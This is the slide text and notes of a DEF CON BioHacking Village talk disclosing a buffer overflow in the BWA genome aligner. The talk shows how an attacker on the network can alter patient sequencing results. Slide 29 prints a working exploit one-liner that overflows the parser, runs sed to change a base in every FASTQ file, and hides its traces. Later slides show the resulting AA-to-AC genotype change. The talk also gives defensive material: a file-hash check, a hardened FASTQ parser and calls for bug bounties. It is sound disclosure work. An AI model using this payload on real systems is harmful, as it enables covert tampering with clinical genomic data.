DEFCON27 BioHacking Village presentation by Corey Hudson and Charles Fracchia.
In this presentation we describe a previously unreported buffer overflow vulnerability in the popular genomics alignment software package BWA. We will show how this exploit, combined with well-known attacks, allows an attacker to access and modify patient data and manipulate genomic tests. We then show how this class of attacks constitutes a wider threat to global biomedical infrastructure and what a newly formed team from Sandia National Labs and BioBright is doing about it.
Speaker Bio: Corey Hudson is a computational biologist at Sandia National Laboratories. Corey leads teams in cybersecurity, machine learning, synthbio and genomics. His main work is modeling and simulating cybersecurity risks in realistic and large-scale genomic systems and highly automated synthbio facilities.
Charles Fracchia is a bioengineer who has worked at the intersection of biology and computer science for the last decade. He is the founder and CEO of BioBright, a company dedicated to making biomedical workflows more data-centric and secure.
2. Corey’s Funding
Supported by the Laboratory Directed Research and
Development program at Sandia National Laboratories, a
multi-mission laboratory managed and operated by National
Technology and Engineering Solutions of Sandia, LLC, a
wholly owned subsidiary of Honeywell International, Inc., for
the U.S. Department of Energy’s National Nuclear Security
Administration under contract DE-NA0003525.
3. What is a Genome’s value?
[Chart labels: NHGRI Data (2019); Illumina (2018); NHGRI Estimate (2011); $1,000]
6. What issues has this growth created?
BROAD Institute Best-Practices Pipeline
ARPANET (1971)
Change in trust model
Need for standardization & automation
7. Bio is turning Digital
Observation: manual
Subject Selection: manual
Analysis: manual
8. Bio is turning Digital
Observation: automated
Subject Selection: automated
Analysis: automated
21. First tool in the pipeline - BWA
1. BWA takes FASTQ files as input and maps these to a reference genome, creating a SAM file
2. In 2014, BWA developers added the ALT-aware capacity, which allows users to map reads
to a population of sequences rather than a single canonical reference
3. Since the population is always changing and requires up-to-date knowledge, the reference is
hosted at a central repository
4. BWA provides a tool – bwa.kit, which accesses this data from the US National Center for
Biotechnology Information (NCBI), which has provided resources for the storage and delivery
of these files as a tarred and gzipped directory of indices:
ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_for_alignment_pipelines.ucsc_ids/
5. The user then unzips and stores the indices provided by NCBI
6. A .alt file is used to index the genome and make it alt-aware
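Because the reference and its .alt index are fetched from a remote server and then trusted by the aligner, one possible safeguard is to check each downloaded file against a digest obtained through a separate trusted channel before using it. The following is a minimal sketch of that idea, not something taken from the talk: the function names and the choice of SHA-256 are assumptions made for illustration.

```python
import hashlib
import hmac


def sha256_of_file(path, chunk_size=1 << 20):
    """Return the hex SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_file(path, expected_sha256):
    """Return True only if the file matches the expected digest.

    expected_sha256 is assumed to come from a trusted, out-of-band source
    (hypothetical here); fetching it over the same channel as the file
    would not protect against a man-in-the-middle.
    """
    actual = sha256_of_file(path)
    return hmac.compare_digest(actual, expected_sha256.strip().lower())
```

A pipeline could call verify_file on the downloaded archive and on the .alt file, and refuse to run the aligner if either check fails.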
27. Crafting an exploit
Goal: after the data are mapped, turn a single A at a
particular position in the genome into a C.
Limits
No other data in the genome can be harmed
(can’t turn all A’s to C’s)
Must change the raw data (so the change is invisible in
follow-on analysis)
28. How to target the position – PCR trick
Running Polymerase Chain Reaction (PCR) requires primers
If you wish to find a particular nucleotide in the genome, you need
primers up and downstream of the nucleotide of interest
Chose A at position 64,544,989 on chromosome 12
Random choice (not clinically meaningful)
7 base pairs upstream and 9 base pairs downstream are sufficient to
be nearly unique
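The flanking-sequence idea can be checked on paper with a few lines of Python. This sketch takes the pattern and replacement strings exactly as they appear in the payload on the slides, reports which literal base differs between them, and counts how often the flanking pattern occurs in a sequence. The helper names and the toy sequence in the usage note are illustrative assumptions; the talk does not describe how uniqueness was verified.

```python
import re

# Strings as shown in the slide payload; "." is a single-base wildcard.
PATTERN = "C.CAGA.AGCTAATGG."
REPLACEMENT = "CACAGAACGCTAATGGG"


def changed_offsets(pattern=PATTERN, replacement=REPLACEMENT):
    """Offsets where a literal (non-wildcard) base differs from the replacement."""
    return [
        i
        for i, (p, r) in enumerate(zip(pattern, replacement))
        if p != "." and p != r
    ]


def count_sites(sequence, pattern=PATTERN):
    """Count non-overlapping occurrences of the flanking pattern in a sequence."""
    return sum(1 for _ in re.finditer(pattern, sequence))
```

For example, changed_offsets() returns [7], meaning 7 bases sit upstream of the targeted base and 9 downstream in the 17-base window, and count_sites("TTT" + "CACAGAAAGCTAATGGG" + "TTT") returns 1 for that toy sequence. Running count_sites over a reference chromosome would be one way to test the "nearly unique" claim.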
29. Full exploit delivered over MitM
python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 +
'/bin/bash -c “sed -i
s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ;
mv .hiddenAltOrig
"GCA_000001405.15_GRCh38_full_analysis_set.fna.alt";
cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash >
GCA_000001405.15_GRCh38_full_analysis_set.fna.alt
Exploit only runs once, but changes all .fq files
31. Three experiments
Setup: 3 sets of simulated reads in data directory
– finalizing as simulated_reads{A,B,C}.vcf
1. Unpatched – no exploit
2. Unpatched – Payload: sed -i
s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g
3. Patched – Payload
32. Output of no exploit
Reference: Genotype AA at chromosome 12 position 64544989.
Output: position 64544989 is absent from the variants or called as A
33. Output of PayloadA – AC one-direction
Reference: Genotype AA at chromosome 12
position 64544989 – output Genotype AC
Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
44. What needs to happen, starting now
1. Hardened parsers for common formats
2. Bug bounties for key software
3. Instrument manufacturers should
publish file format specs & parser code
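As an illustration of what a "hardened parser" in item 1 might look like, here is a minimal sketch of a FASTQ reader that bounds every line length and validates each field before yielding a record. It is not the project's parser: the length cap, the allowed base alphabet, and the assumption of strict four-line records are all choices made for this example.

```python
import io

MAX_LINE_BYTES = 10_000  # hypothetical cap, includes the line terminator
ALLOWED_BASES = frozenset(b"ACGTN")  # assumed alphabet for this sketch


class FastqFormatError(ValueError):
    """Raised when input does not look like well-formed four-line FASTQ."""


def _read_line(stream):
    """Read one line with a hard length bound; return None at end of input."""
    raw = stream.readline(MAX_LINE_BYTES + 1)
    if len(raw) > MAX_LINE_BYTES:
        raise FastqFormatError("line exceeds length cap")
    if raw == b"":
        return None
    return raw.rstrip(b"\r\n")


def parse_fastq(stream):
    """Yield (name, sequence, quality) tuples from a binary stream."""
    while True:
        header = _read_line(stream)
        if header is None:
            return
        seq, plus, qual = (_read_line(stream) for _ in range(3))
        if seq is None or plus is None or qual is None:
            raise FastqFormatError("truncated record")
        if not header.startswith(b"@") or not plus.startswith(b"+"):
            raise FastqFormatError("bad record markers")
        if any(b < 32 or b > 126 for b in header):
            raise FastqFormatError("non-printable byte in header")
        if not seq or not set(seq) <= ALLOWED_BASES:
            raise FastqFormatError("unexpected character in sequence")
        if len(qual) != len(seq) or any(q < 33 or q > 126 for q in qual):
            raise FastqFormatError("bad quality string")
        yield header[1:].decode("ascii"), seq.decode("ascii"), qual.decode("ascii")
```

With this sketch, list(parse_fastq(io.BytesIO(b"@r1\nACGT\n+\nIIII\n"))) gives [("r1", "ACGT", "IIII")], while a header line longer than the cap raises FastqFormatError instead of being passed downstream.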
45. Asks
Wanna fund bug bounties? Come talk to us
Instrument Vendors, come talk to us
Send us sample files!
https://bit.ly/2yxzy8I
Thoughts on overall structure:
Intro of who we are & disclaimer on Sandia funding
Genome’s value & pressure created by this growth
This has led to a total dependence on digital tools: biomedical research has now reached a stage where digital tools are ubiquitous and cannot be removed
HOWEVER, these tools primarily come from academia or are poorly supported, often BOTH. Show disparity with "industrial tools", talk about what BB sees in the field: companies having to build their own tooling, often cobbled together from open source tools, with VERY little-to-no sensitivity to or expertise in infosec
End with the long list of open source ALIGNMENT software, highlight BWA [SEGUE for Corey]
Talk about vulnerability and context, chained attack vector and result!
PAUSE for effect
Return to diagram of fully automated biomed near-future and show how each link in the chain can be a vector of attack. Link to the wider problem
Show list of instrumentation that we often see in labs and outline the ones with INPUTS and OUTPUTS
Explain how large volumes of data (OUTPUTS) further increase reliance on digital tools and how integrity is key
Hint at the project to identify and patch vulnerabilities in bio file formats
Ask for people to contribute expertise & sample file formats
Since the birth of modern biomedicine as an observable science in the 16th century, biomedicine has been dominated by manual processes
However, we are now at a crucial inflection point for the field thanks to automation and digital tools finally becoming available
Critical Workflows rely on digital tools
Kiestra TLA on left – from Automation in Clinical Microbiology in ASM Journal of Clinical Microbiology https://doi.org/10.1128/JCM.00301-13
BROAD Somatic Cell Line Pipeline on right
Imagine if your LIQUID HANDLER goes down
SEQUENCER
IMAGER
ELECTRONIC LAB NOTEBOOK